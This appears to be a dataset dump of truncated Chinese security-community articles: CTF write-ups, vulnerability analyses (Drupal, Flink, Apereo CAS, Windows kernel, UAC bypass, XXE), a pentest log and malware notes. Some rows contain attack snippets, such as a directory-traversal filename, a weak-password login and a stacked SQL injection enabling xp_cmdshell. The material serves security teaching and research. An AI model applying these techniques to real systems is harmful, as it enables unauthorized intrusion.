text stringlengths 100 9.93M | category stringclasses 11
values |
|---|---|
# 通过众包方法检测针对空管监控系统的攻击
|
##### 译文声明
本文是翻译文章,文章原作者 Kai Jansen,Liang Niu,Nian Xue,Ivan Martinovic,Christina
Popper,文章来源:researchgate.net
原文地址:<https://www.researchgate.net/profile/Nian-Xue/publication/349522456_Trust_the_Crowd_Wireless_Witnessing_to_Detect_Attacks_on_ADS-B-Based_Air-Traffic_Surveillance/links/6034f2bc299b... | 社区文章 |
# 侧信道攻击研究——PADDING ORACLE
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 一. 引言
大家好,我是来自银基安全实验室的Cure,本次为大家带来的是Padding Oracle攻击的相关介绍与实践。
随着Web服务的日益流行,Web数据的安全传输愈发引起业界重视。HTTPS协议的常见实现经历了从SSL到TLS的变化,目前,使用最广泛的TLS协议为TLS
1.2,为各个浏览器普遍支持,而最新TLS 1.3协议,更是在TLS 1.2的基础上简化了交互流程,提高了性能。
然而,目前的许多Web网站,出于种种原因,仍然采用着古老的HTTP协议。HTTP协议对传输的数据不作... | 社区文章 |
# ISCC 2020 Web WriteUp
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
记录一下ISCC2020历经25天的Web题解,题量可能有点多 QAQ
!!针对题目的难易程度上:易、中、难都有(老少皆宜),此次比赛和以往不太一样,增加了擂台题和实战题一定程度上还是不错的。
## 练武题-Web
### 阿森的爱情-1
考点:敏感信息收集
使用工具对网站进行敏感信息的探测,存在`readme.txt`
访问`readme.txt`直接得到flag
flag{uragoodman}
### 阿森的爱情-2
考点:SQL注入
题目打开是一个登录界面,测试是否存在... | 社区文章 |
# 【技术分享】通过伪造DNS响应绕过域名所有权验证
|
##### 译文声明
本文是翻译文章,文章来源:detectify.com
原文地址:<https://labs.detectify.com/2017/09/11/guest-blog-bypassing-domain-control-verification-with-dns-response-spoofing/>
译文仅供参考,具体内容表达以及含义原文为准。
译者:[testvul_001](http://bobao.360.cn/member/contribute?uid=780092473)
预估稿费:120RMB
投稿方式:发送邮件至linwei#360.cn,或登... | 社区文章 |
## 前言
近日,对某cmsV9.9版本进行代码审计,发现了4处漏洞。
这4处漏洞漏洞比较基础,也很经典。从这4处漏洞,可以反应了在程序开发过程中一些容易忽略的问题,下面分享下本次审计过程。
## 审计之旅
在开发程序时,如果没有正确的过滤单引号(')、双引号(")、反斜杠(\)等特殊字符,往往会产生代码/sql注入漏洞。
在针对这些特殊字符,开发者经常使用如下方式进行过滤:
1. 使用addslashes进行过滤
2. 使用str_replace对单引号等进行替换操作
3. 使用is_numeric等方法对数字类型的输入进行判断与过滤
审计此cms时发现,以上3种方式,在此程序的开发过程中,都有使用。但是,不严谨的使用... | 社区文章 |
# DASCTF五月月赛 暨 BJDCTF 3rd 部分WP
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
这里是主要是crypto和misc部分的wp。
## WEB
### gob
登录万能密码登(好像可以直接随便输?)然后是一个上传界面
上传后易得一个二级目录uploads,然后看了看目录里都是各种马,但是因为不解析所以一个都没用。。。
但是此时发现文件上传后文件名并没有被更改,所以推测show.php文件包含也是直接包含的我们上传的文件名,所以构造一个`../../../../flag`文件进行目录穿越,再访问就可以得到flag的base64,解密即为flag(PS:必须得在同一个... | 社区文章 |
# 2019第三届强网杯部分WP
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 强网先锋-上单
访问网站文件log文件,发现ThinkPHP 远程命令执行漏洞
## 强网先锋-辅助
废话不多说直接怼脚本
## Crypto-Copperstudy
flag{767bc73bedd446b5891ac3f2a3329bfb3502114647cda27b3dbdf0119c261022}
(1)Chalenge 1
第一关给出模N,加密指数e和明文m,明文512位,但低72位被隐藏,因此Stereotyped
messages攻击,用sage求出明文低位。得出明文低72位为190298140... | 社区文章 |
**作者: Veraxy@QAX CERT
原文链接:<https://www.freebuf.com/vuls/260184.html>**
**Apache Flink** 是由Apache软件基金会开发的开源流处理框架,其核心是用Java和Scala编写的分布式流数据流引擎。
# 0x01 环境搭建
个人喜欢手动搭建环境,已有相关漏洞环境的盆友可越过这节,直接看漏洞部分。
1. **JDK装好**
2. **安装Flink**
安装包地址:<https://archive.apache.org/dist/flink/flink-1.11.2/>
为同时满足两个漏洞环境,这里安装1.11.2版本
解压缩
# tar ... | 社区文章 |
# 黑客思维养成记 ——黑客的“小鸡”
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
作者:閦蠱[@Duncan](https://github.com/Duncan "@Duncan") SecTeam
## 0x.00、引言
为了给Duncan
SecTeam做一些技术分享,思前想后,我觉得有必要利用假期先分享一些思维方式方面的东西,因此才想写一些关于“黑客思维”方面的文章,于是有了这篇探索性的文章。本文纯属个人经验之谈,尚不成熟,见笑了。
其实,第一次听说“黑客思维”(hacker’s
mindset)这个词,是源自TedEx上的一个美国小黑客分享的演讲。透过这些年经历的各种事情,自己... | 社区文章 |
最近想做一个对于多站点的网站漏洞扫描器(上万规模),因为不知道如何选择后端的扫描引擎而走了不少弯路,用Google搜索扫描器出来的结果差不多都是四五年前的...
直接上网站 ---> <http://sectoolmarket.com/>
这个网站横向对比了现在市场上的各种扫描工具,包括收费的和开源的,以下是部分内容:
1. 探测技术的支持情况
1. 扫描器的价格排行
1. 爬虫引擎的爬取率
看完之后,感觉通用扫描器的蛋糕已经快瓜分玩了....
基于流量检测(被动扫描)和基于CMS识别的扫描才是未来的趋势。
另外:有用过长矛这类国产扫描器的同学能讲讲使用感受吗? | 社区文章 |
### 0x01 概述
7月17日,Drupal官方发布Drupal核心安全更新公告,修复了一个访问绕过漏洞,攻击者可以在未授权的情况下发布/修改/删除文章,CVE编号`CVE-2019-6342`
公告地址:<https://www.drupal.org/sa-core-2019-008>
### 0x02 受影响的版本
* Drupal Version == 8.7.4
### 0x03 漏洞复现
安装`Drupal 8.7.4`版本,登录管理员账户,进入后台`/admin/modules`,勾选`Workspaces`模块并安装
在页面上方出现如下页面则安装成功,管理员可以切换`Stage`模式或者`Live`模式
另外开... | 社区文章 |
# 浅析RSA Padding Attack
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
近日在复盘一些Crypto的题目,做到了N1CTF的一道rsapadding,进行了一些拓展,于是进行了一些分析记录,有了这篇文章
## 题目分析
题目已开源在
https://github.com/Nu1LCTF/n1ctf-2018/tree/master/source/crypto/rsapadding
主要代码为
m = '*****************'
n = 217271065517972314003307967214011570371311785... | 社区文章 |
# 深入理解JSObject内部实现
##### 译文声明
本文是翻译文章,文章原作者 liveoverflow,文章来源:liveoverflow.com
原文地址:<https://liveoverflow.com/setup-and-debug-javascriptcore-webkit-browser-0x01/>
译文仅供参考,具体内容表达以及含义原文为准。
## 0x00 前言
在本文中,我们来分析JavaScript在内存中的基本结构,同时了解一下其中涉及到的butterfly(蝶式)结构。
我们可以通过内存中的`JSObject`结构来了解`JavaScriptCore`内部实现。之前saelo已经在[phrack... | 社区文章 |
# 【漏洞预警】CVE–2017–8543 Windows Search远程代码执行漏洞预警(含演示)
|
##### 译文声明
本文是翻译文章,文章来源:安全客
译文仅供参考,具体内容表达以及含义原文为准。
作者:Shi Lei @360CERT && 360 GearTeam
**描述**
日前,360CERT确认了编号 **CVE-2017-8543** 的微软Windows
Search严重漏洞存在被远程攻击的可行性,该漏洞被成功利用会对Windows用户产生严重的安全威胁,在此再次预警使用Windows平台的用户立即进行微软的2017年6月的安全补丁更新操作或安装“360安全卫士”进行有效防御。
微软在今年6月中旬发布的补... | 社区文章 |
# Apereo CAS 4.X反序列化漏洞分析
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 0x01 漏洞描述
其实这个洞在2016年时候就出来了,Apereo
Cas一般是用来做身份认证的,所以有一定的攻击面,漏洞的成因是因为key的默认硬编码,导致可以通过反序列化配合Gadget使用。
## 0x02 环境搭建
[下载地址](https://mvnrepository.com/artifact/org.jasig.cas/cas-server-webapp),直接选择对应的版本,选择war进行下载,然后导入到tomcat中,运行即可。
## 0x03 漏洞分析
这里做个区分,因为... | 社区文章 |
# Windows内核栈溢出从win7 x86 到win8 x64
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 一、环境准备
Win 10 64位 主机 + win 7 32位虚拟机
Win 10 64位 主机 + win 8 64位虚拟机
Windbg:调试器
VirtualKD-3.0:双击调试工具
InstDrv:驱动安装,运行工具
HEVD:一个Windows内核漏洞训练项目,里面几乎涵盖了内核可能存在的所有漏洞类型,非常适合我们熟悉理解Windows内核漏洞的原理,利用技巧等等
## 二、win7 x86 环境
win7 x86下比较简单,这里简单过一下
先看下代码:
... | 社区文章 |
# 一例IRC Bot针对Cuckoo沙箱的猥琐对抗分析
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
**作者:ManchurianClassmate**
最近我们通过蜜罐捕获到一例Windows平台的恶意样本,该样本是通过IRC服务器和C2进行通讯的一种IRC
Bot。这种C2通讯方式的恶意程序已经屡见不鲜,但这次这个样本的特别之处在于它包含了非常猥琐的沙箱对抗机制,当样本正常运行的时候和普通的IRC
Bot并没有什么-两样,但是当将它放在沙箱里面的时候会发现沙箱根本捕获不到任何恶意行为,从而逃过检测。
## 0x00 简单介绍一下Cuckoo
Cuckoo是目前使用得非常广泛的一种动态分析... | 社区文章 |
**作者:Y4tacker
原文链接:<https://tttang.com/archive/1692/>**
## 写在前面
之前周末忙着强网杯,对这道题只做了一半就搁置下来了,最后卡在绕过最新pebble模板引擎RCE那里,今天抽空来继续进行剩下的分析,正好题目里有几个在现实场景当中能用的trick顺便也分享了
## 题目环境分析
也是挺不错题目直接给了docker环境便于本地搭建,同时设置了权限需要执行./getflag才能获取获得flag
FROM openjdk:18-slim-bullseye
RUN mkdir /usr/src/app
WORKDIR /usr/src/app
# ... | 社区文章 |
# 基于Web攻击的方式发现并攻击物联网设备
|
##### 译文声明
本文是翻译文章,文章原作者 netsparker,文章来源:netsparker.com
原文地址:<https://www.netsparker.com/blog/web-security/discovering-hacking-iot-devices-using-web-based-attacks/>
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
近二十年来,DNS重绑定(DNS
rebinding)攻击一直是讨论的话题。尽管浏览器厂商做出了努力,但仍然无法找到一个能稳定抵御这些攻击的防御系统。据说这类问题八年前就已经被修复了。但是这类攻击通过新... | 社区文章 |
# 前言
XXE的防御来说,实现方法千奇百怪(这里指的是那些基础库,像apache-poi这种解析excel的XXE,内部还是调用的那些基础库,修复方式当然只要升级对应版本即可)
Owasp的修复文档
<https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html>
主要方式都是`setFeature`的方式来设置几个`features`,而且设置的都是一些无规律和章法的url常量,对于一个初学XXE的人来说,想要知道其中的原理,学习成本可能要比单纯的了解XXE要复杂的多。
由于具体的XML解析实现类比较多... | 社区文章 |
# AFL-Training学习记录
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
最近发现一个AFL的学习资料:[https://github.com/mykter/afl-training。](https://github.com/mykter/afl-training%E3%80%82)
本文主要记录了我学习Fuzzing Workshop的过程,以及中间遇到的问题和思考。
希望能够对大家学习fuzzing或者AFL有所帮助。
这个workshop由几个challenge组成,这些challenge的目的是用AFL在开源软件里复现漏洞。漏洞主要包括下面几个,每个漏洞都... | 社区文章 |
# INCASEFORMAT蠕虫病毒网络传播风险通告
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 0x01 背景
1月13日,360安全大脑检测到蠕虫病毒incaseformat大范围爆发并进行了预警,此次病毒爆发涉及政府、医疗、教育、运营商等多个行业,该病毒在感染用户机器后会通过U盘自我复制感染到其他电脑,最终导致电脑中非系统分区的磁盘文件被删除,给用户造成极大损失。由于被删除文件分区根目录下均存在名为incaseformat.log的空文件,因此网络上将此病毒命名为incaseformat。
Incaseformat蠕虫病毒爆发后,部分安全厂商对incaseformat病毒的传播途径... | 社区文章 |
**作者:LoRexxar'@知道创宇404实验室
日期:2021年2月5日**
反序列化漏洞是PHP漏洞中重要的一个印象面,而反序列化漏洞的危害则需要反序列化链来界定,如何挖掘一条反序列化链,往往成为了漏洞挖掘中最浪费时间的部分。
而和挖掘漏洞一样,建立在流敏感分析基础上的自动化白盒漏洞扫描技术,依赖数据流中大量的语法节点数据,通过合理的分析手段,我们就可以回溯分析挖掘漏洞,而挖掘php反序列化链也一样,只要有合理的分析思路,那么我们就可以通过分析数据流来获得我们想要的结果。
今天我们就来一起聊聊,如何把人工审计转化成自动化挖掘方案吧~
# 如何挖掘一个PHP反序列化链
反序列化漏洞的原理这里就不再赘述了,而PoP链的核心,就... | 社区文章 |
前言:上个月月初开始,在那些项目结束之后进入了挖洞时期,每天的日常工作就是挖洞,除非有临时的项目才会停下,最近在整理报告,发现了这个站,还是挺有意思的。
### 信息收集
从fofa上找到了这个站点,叫做fastadmin,是基于Thinkphp5和bootstrap开发的后台框架,常规思路找一下后台,根据经验,没意外的话php的站点基本都是根路径后加个admin就可以找到了
### getshell
常规手段弱口令先打一波,不行再试试SQL注入
弱口令admin/123456成功进入后台
因为结合了tp5框架,想到可能可以用tp5的RCE直接命令执行,再利用file_put_contents写入shell,就直接来试试... | 社区文章 |
# 链表游戏:CVE-2017-10661之完全利用
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
huahuaisadog @ 360VulpeckerTeam
最近在整理自己以前写的一些Android内核漏洞利用的代码,发现了一些新的思路。
CVE-2017-10661的利用是去年CORE TEAM在hitcon上分享过的:<https://hitcon.org/2017/CMT/slide-files/d1_s3_r0.pdf>。他们给出的利用是在有CAP_SYS_TIME这个capable权限下的利用方式,而普通用户没这个权限。最近整理到这里的时候,想了想如何利用这个漏洞从0权限到roo... | 社区文章 |
# 【技术分享】点击型僵尸app:能够自动点击的安卓僵尸app(下)
|
##### 译文声明
本文是翻译文章,文章来源:安全客
原文地址:<https://blog.zimperium.com/clicking-bot-applications/>
译文仅供参考,具体内容表达以及含义原文为准。
**译者** **:**[
**興趣使然的小胃**](http://bobao.360.cn/member/contribute?uid=2819002922)
**预估稿费:200RMB**
**投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿**
**传送门**
****
[******【技术分享】点击型僵尸app:... | 社区文章 |
### 0x01 初始化
目标是这个样子的:
开发商已知,搜索引擎没找到洞。。。
### 0x02 加载中
登陆口可以爆破,但是:
用户名也遍历不了,简单爆破了一下, **无果** 。
前台JS的文件命名很有意思:
满屏SB:
开发当时的怨气挺重的。
每个JS都仔细分析了一遍, **无果** 。
扫了一下目录, **无果** 。
扫了一下端口, **无果** 。
关注到UI有这个:
群文件里面下载到APP:
日常反编译看看代码:
Web2App,有几个开发方的接口地址,未见到目标地址。不过通过接口翻阅,找到目标地址:
木有日错...
web2app没有太多继续看代码的必要,模拟器抓包。
实名吐槽一下网易mumu Mac版,经常启动不... | 社区文章 |
# ByteCTF2021决赛 MasterOfHTTPD 复现与简要分析
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
队内大哥太顶了,大哥都快出了,我才找到漏洞位置ahhh,在赛后重新复现一下。
## 0x00 漏洞分析
首先通过ida分析,发现是个aarch64架构的mini_httpd,版本号为1.30。
mini_httpd是一个开源的小型HTTP服务器,我们从[这里](https://acme.com/software/mini_httpd/)下载源码,一方面是便于理解server工作逻辑;一方面是通过交叉编译,可以恢复大部分函数符号表,便于我们寻找漏洞点。
下载完源码之后我们修... | 社区文章 |
# 【缺陷周话】第36期:弱验证
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 1、弱验证
弱验证是指由于应用程序验证不足导致浏览器执行恶意代码。当不受信任的数据进入 Web 应用程序,应用程序会动态生成网页,在页面生成期间,由于应用程序依靠
HTML、XML 或其他类型编码验证,而验证方式不足,程序并不会阻止 Web 浏览器解析可执行的内容,例如 JavaScript、HTML 标记、HTML
属性、鼠标事件、Flash、ActiveX等,这样生成的网页包含不受信任数据,攻击者可执行恶意代码攻击用户。本文以JAVA语言源代码为例,分析弱验证缺陷产生的原因以及修复方法。详细请参见:
*... | 社区文章 |
# Part 1
## **简介**
这篇文章是由三部分组成的系列文章之中的第一篇,该系列文章描述了在 [WoW64](https://www.sentinelone.com/blog/now-stage-deep-hooks-monitoring-native-execution-wow64-applications/)应用程序(在64位Windows平台上运行的32位进程)中连接本机NTDLL时必须克服的困难。正如[某些来源](https://docs.microsoft.com/zh-cn/windows/desktop/WinProg64/wow64-implementation-details)所记录的那样,WoW64进程... | 社区文章 |
# 黑产情报 | 定向“投毒”黑吃黑,剧情酷似“碟中谍”
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
黑产江湖纷争不断
而今天要说剧情酷似“碟中谍”
Did you hear me?
The list is in the open.
你听见了吗?名单已经外泄。
——《碟中谍》
故事要从最早我们熟知的微商套路说起,微商朋友圈最常晒的除了豪车豪宅、名包名表,还有各种收款截图,营造一种轻轻松松赚大钱的迷惑氛围,当然最终目的就是:卖产品、招代理,“收割”这路子算是就这么打开了。
再后来,在一些诈骗案件中,也发现了不法分子制作虚假的转账截图行骗的情况。
从早期的调研情况看,此类截图很多来自于转账生成器或... | 社区文章 |
# 【技术分享】Windows8.1中的沙箱逃逸问题
|
##### 译文声明
本文是翻译文章,文章来源:blogspot.com
原文地址:<https://googleprojectzero.blogspot.com/2015_05_01_archive.html?m=0>
译文仅供参考,具体内容表达以及含义原文为准。
****
翻译:[Ox9A82](http://bobao.360.cn/member/contribute?uid=2676915949)
预估稿费:200RMB
投稿方式:发送邮件至[linwei#360.cn](mailto:linwei@360.cn),或登陆[网页版](http://bobao.360.... | 社区文章 |
# 【技术分享】基于虚拟化的安全(part2):内核通信
|
##### 译文声明
本文是翻译文章,文章来源:amossys.fr
原文地址:<http://blog.amossys.fr/virtualization-based-security-part2.html>
译文仅供参考,具体内容表达以及含义原文为准。
****
****
翻译:[myswsun](http://bobao.360.cn/member/contribute?uid=2775084127)
预估稿费:140RMB
投稿方式:发送邮件至[linwei#360.cn](mailto:linwei@360.cn),或登陆[网页版](http://bobao.3... | 社区文章 |
## 前言
我有一个骚想法:这么多年来,我一直从事安全方面的工作,提供了很多的渗透测试服务和红队服务。
我一开始做渗透的时候也能很快拿到DC权限。
2013年9月,Spider Labs写了一篇文章,标题是[通过SpiderLabs在内网中拿到DC的五种方法
](https://www.trustwave.com/Resources/SpiderLabs-Blog/Top-Five-Ways-SpiderLabs-Got-Domain-Admin-on-Your-Internal-Network/)。
这篇文章就当作是它的后续吧。
## Netbios和LLMNR名称中毒
虽然说`Netbios/LLMNR`并不像2013年... | 社区文章 |
# 利用Office公式编辑器特殊处理逻辑的免杀技术分析(CVE-2017-11882)
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 背景
2018年8月24日,360威胁情报中心捕获到一个专门为乌克兰语使用者设计的钓鱼文档:该文档为RTF文件格式,且有详细的文档内容。360威胁情报中心经过分析确认这是首次发现的针对Office公式编辑器特殊处理逻辑而专门设计的用于绕过杀毒软件查杀的漏洞利用样本,涉及的漏洞正是CVE-2017-11882。
由于漏洞触发后的Payload已失效,360威胁情报中心在本文中专门针对样本使用的特殊免杀技术进行详细分析,并提醒各杀毒软件厂商做好针对该利用方式的... | 社区文章 |
# 针对新型进程注入技术Ctrl-Inject的原理分析
|
##### 译文声明
本文是翻译文章,文章来源:https://blog.ensilo.com/
原文地址:<https://blog.ensilo.com/ctrl-inject>
译文仅供参考,具体内容表达以及含义原文为准。
## 概述
在本文中,我们将主要介绍一种新型的进程注入方法,我们称之为“Ctrl-Inject”,它利用控制台应用程序中处理Ctrl信号的机制实现注入。在研究的过程中,我们在浏览MSDN时发现有一条关于Ctrl信号处理的相关评论:
“这是一个与SetConsoleCtrlHandler函数( <https://docs.microsoft.c... | 社区文章 |
最近,微软的Internet
Explorer脚本引擎中被爆出一个可能导致远程代码执行的漏洞,之后相关人员对其进行了修补工作。该漏洞是由谷歌漏洞分析小组的人员经过研究发现的,并发报告声明其正在被黑客组织利用。为此,微软特意在正常补丁更新周期外发布了修复程序。McAfee的产品也同样进行了补丁更新,便于后期对漏洞进行管理。
远程攻击者可以通过特定的网站并使用版本9到11的Internet
Explorer浏览器。除此之外,恶意网络上的攻击者同样可以使用带有攻击脚本引擎(jscript.dll)的Web代理自动进行发现服务。不过Microsoft
Edge不会受影响,然而在应用Microsoft进行安全修补程序之前,其他包含脚本引擎的W... | 社区文章 |
_自动化躺赚系列 02_ 以后可能还有,哈哈哈。
自动化躺赚系列 01 业务漏洞挖掘笔记 <https://xz.aliyun.com/t/9028>
## 1.自动黑盒漏洞检测思路
黑盒测试,也就是盲测http请求,进行漏洞挖掘,如检测挖掘XSS\SQL\SSRF\命令执行\代码执行 甚至于越权之类漏洞,此类漏洞都属于,代码/命令
拼接时不严谨出现的问题。
如挖sql注入,'" 如xss '"><script>, 如ssrf,替换请求参数值为url链接的请求,命令执行 代码执行依次...
在黑盒挖掘它们时的操作规律为在参数值后面 “追加/替换/值前追加"
payload等操作,既然发现此规律,我们就可以依此规律分析后,... | 社区文章 |
## 0×01 引言
我们渗透的最终目的是获取服务器的最高权限,即Windows操作系统中管理员账号的权限,或LINUX操作系统中root账户权限。而在内网中,我们的最终目的就是获取域管理员账户或成为其中之一。今天要讲的就是如何通过一个普通的webshell权限一步步的获得域管权限,从而掌控整个内网。
## 0×02 渗透环境
此次渗透的环境:假设我们现在已经渗透了一台服务器PAVMSEF21,该服务器内网IP为10.51.0.21。经过扫描,内网网络结构大概如下图所示。其中我们控制的服务器是连接外网和内网的关键节点,内网其他服务器均不能直接连接。图还是我老婆画的,越来越漂亮了!:
)
## 0×03 反弹meterpreter
上... | 社区文章 |
# 使用x64dbg脱壳之开源壳upx
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
# 使用x64dbg脱壳之开源壳upx
## 引言
大家好我是蓝铁,你们的老铁,^_^
我们知道在分析病毒的时候,最常见的一种壳就是upx,使用upx的好处就是压缩率还不错,可以让原程序缩小一倍,便于在网络中传输。本节就是以开源壳upx为例讲解x64dbg中的脱壳方法。
## 脱壳中的一些常见概念
首先我向大家介绍一下脱壳相关的概念。
* 壳
外壳,英文为shell,在黑客技术中,一种比较高超的加密技术,对可执行文件(例如windows下的exe文件、Linux下的elf文件)进行加密压缩处理的... | 社区文章 |
# 利用注册表键值绕过UAC实现提权
##### 译文声明
本文是翻译文章,文章来源:https://attackiq.com
原文地址:<https://attackiq.com/blog/2018/05/14/bypassing-uac-using-registry-keys/>
译文仅供参考,具体内容表达以及含义原文为准。
## Think Bad,Do Good
近期我们打算公开一系列文章,本篇文章为第一篇,欢迎大家的阅读。我们的目的是提供足够多的和安全威胁相关的技术数据来解决大家心中的疑惑,不仅如此,也希望大家可以理解我们所面临安全威胁的内部技术原理。
这一系列的文章列举了一些我们认为大家会比较感兴趣且熟知的攻击场景。某... | 社区文章 |
#### nodejs中的漏洞技巧
#### 关于原型链
在javascript中,继承的整个过程就称为该类的原型链。
每个对象的都有一个指向他的原型(prototype)的内部链接,这个原型对象又有它自己的原型,一直到null为止。
在javascript中一切皆对象,因为所有的变量,函数,数组,对象
都始于object的原型即`object.prototype`,但只有类有对象,对象没有,对象有的是`__proto__`。
like:
日期时:
`f -> Data.prototype -> object.prototype->null`
函数时:
`d -> function.prototype -> object.proto... | 社区文章 |
**背景:**
励志做一个摸鱼仔,无奈摸鱼摸到一半,老大发了一个pcap包,说是应急单位在溯源,想要还原出攻击代码。无奈之下只有从摸鱼的状态恢复回来。
包是这个样子的,熟悉的小伙伴已经大概清楚了,是个反序列化的数据。我们要还原就要把数据提取出来。利用wireshark导出字节流,在本地打开看看。
接下来就是还原数据了。开始找的文章说可以直接命名class然后用反编译工具打开。试了一下死活不成,后来仔细想了一下,反序列化的数据要是能直接用反编译就见鬼了。那就笨办法,直接反序列化数据出来,然后跟一下链子的执行过程。代码如下,接下来在idea里面开冲。
**流程分析**
由于一开始不知道是哪里触发的,只能在readObject下个... | 社区文章 |
# 前言
前段时间试着挖了一段时间的src,在挖掘过程中由于相当多的站是使用weblogic搭建的,手工测测得有点疲惫了,网上也没找到比较好的工具。于是花了两三天的时间写了一个。感觉效果还行?
前期检测的功能不是特别多,但是比起手工已经省了不少的力气了。后期尽量会继续加些功能的。
github地址:<https://github.com/kingkaki/weblogic-scan>
# weblogic-scan
weblogic 漏洞扫描工具
~~妄想~~ 试图weblogic一把梭
目前检测的功能
* [x] console 页面探测 & 弱口令扫描
* [x] uuid页面的SSRF
* [x] CVE-... | 社区文章 |
# WMI 的攻击,防御与取证分析技术之攻击篇
|
##### 译文声明
本文是翻译文章,文章来源:wooyun
原文地址:<http://drops.wooyun.org/tips/9973>
译文仅供参考,具体内容表达以及含义原文为准。
近日,FireEye 安全公司的高级逆向工程团队(FLARE)发布了一份标题为《 WMI 攻击,防御与取证分析技术 》的 PDF 文档,该文档页数多达 90
页,文档内容主要从攻击,防御和取证分析这三个角度分篇对 WMI
技术做了详细的描述。其中不乏有很多值得学习思考的地方。于是,我利用业余时间翻译整理了此文档,拿出来与大家共分享 :),如有纰漏,望各位不吝赐教。
为了对原文档内容进行全面的翻译... | 社区文章 |
# 【技术分享】使用Flare、Elastic Stack、IDS检测恶意软件通信的“beaconing”
|
##### 译文声明
本文是翻译文章,文章来源:austintaylor.io
原文地址:<http://www.austintaylor.io/detect/beaconing/intrusion/detection/system/command/control/flare/elastic/stack/2017/06/10/detect-beaconing-with-flare-elasticsearch-and-intrusion-detection-systems/>
译文仅供参考,具体内容表达以及含义原文为准。
*... | 社区文章 |
# 基于边界节点链路交互C2流量
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
作者:风起
## 前记
大家好,我是风起,相信之前有不少小伙伴了解过 **《C2设施前置流量控制技术》**
,本次分享的是基于RedGuard实现的C2流量高级隐匿手法,具体实现也是基于在打点过程中,当已获取到边缘主机权限并以此作为节点从而实现与内网主机进行隐蔽的流量交互,同时赋予域前置、流量控制,沙箱分析规避等效果。通过自定义内网主机交互域名,而边缘主机使用域前置CDN节点交互。达到了两台主机之间交互信息的不对称,使溯源难度更大,难以排查。
**本文是C2前置流量控制技术的一种延伸技巧,所以主要也是从效果实... | 社区文章 |
**作者:Y4er**
**原文链接:<https://y4er.com/post/from-hop-by-hop-to-cve-2022-1388/>**
## 前言
最近爆出来的bigip的CVE-2022-1388漏洞,涉及到一个知识点就是hop by hop,对这个东西没了解过,所以有了此文。
## 回顾CVE-2021-22986
CVE-2021-22986原理是因为apache和jetty之间的鉴权不当导致的权限绕过。
当不存在Authorization
basic认证头时,由apache做权限校验,判断basic认证头是否存在,此时response中的server头为apache
当给一个错误的basic认证头时... | 社区文章 |
# ThinkPHP安全开发规范
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 常见安全问题
目前ThinkPHP在国内中小型开发场景非常流行,但由于漏洞频发,主要集中在SQL注入、信息泄露(debug模式打开)、越权等漏洞,使得业务安全性受到不小的挑战。另外由于ThinkPHP版本比较多,实际业务多用3.2.3或5.1,因此下面主要从这两个版本来介绍ThinkPHP开发过程中常见的安全问题。
### SQL注入
极少业务出现使用官方默认数据库操作方法引发SQL注入的,通常是业务不用官方I函数或者标准方法,而是自定义了过滤函数,例如下面的`recursive()`,由于采用的黑名单方... | 社区文章 |
# 强网杯 广博的BlueTeaming
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## blueteaming
### 解法一
把注册表dump下来
python2 vol.py -f memory.dmp --profile=Win7SP1x64 dumpregistry -D ctf/
dump下来后拖到windows,用registerExplorer来找。发现拖进来后只有15个注册表,少的是SOFTWARE这个表里的,而且无法拖进registerexplorer。
python2 vol.py -f memory.dmp --profile=Win7SP1x6... | 社区文章 |
# 2021暗泉杯(东软杯)PWN/RE WP
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
这是第一届2021暗泉杯(东软杯)的pwn和re题解,这次比赛pwn看似不难,但是还是缺少思路,其中两道题目都是相似的逻辑,应该是一个出题人出的题目,当时没想到爆破,呜呜呜呜
## PWN -> NSS_shop
这个是签到题目,据官方说是个整数溢出,随便输点大数造成整数溢出就可以拿到flag
--------------- 0.Flag: 10000$
1.Hint: 0$
--------------- > 0
Number of item... | 社区文章 |
# 实战记录之曲线救国
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
记录一次实战稍曲折拿下目标站点的过程。
## 前期摸点
IIS7.0+ASP.NET的组合,简单尝试发现前台登录页面可能存在SQL注入,数据包如下:
为了节约时间直接祭出sqlmap,`-r x.txt -v 3 --random-agent --dbms=mssql --batch`
识别出了数据库,却被不明力量拦截了。
手工尝试绕过不明力量,堆叠的方式利用xp_cmdshell尝试将命令回显从dnslog中带出来:
> 先开xp_cmdshell:`EXEC sp_configure 'show advanced opti... | 社区文章 |
# Joomla 3.4.7 修复的反序列化与SQL注入
|
##### 译文声明
本文是翻译文章,文章来源:360安全播报
译文仅供参考,具体内容表达以及含义原文为准。
**作者: Mars@0kee Team**
Joomla! 官方12月21号发布了3.4.7 新版程序,其中修复了Session序列化和一处SQL注入。
##
## 反序列化漏洞修复分析
前一阵子 Joomla 的对象注入很火,而官方 3.4.6 的修复仅仅是严格过滤了 X_FORWARDED_FOR 和注释了 USER_AGENT 存入
SESSION 那一句,见:[https://github.com/joomla/joomla-cms/commit/99... | 社区文章 |
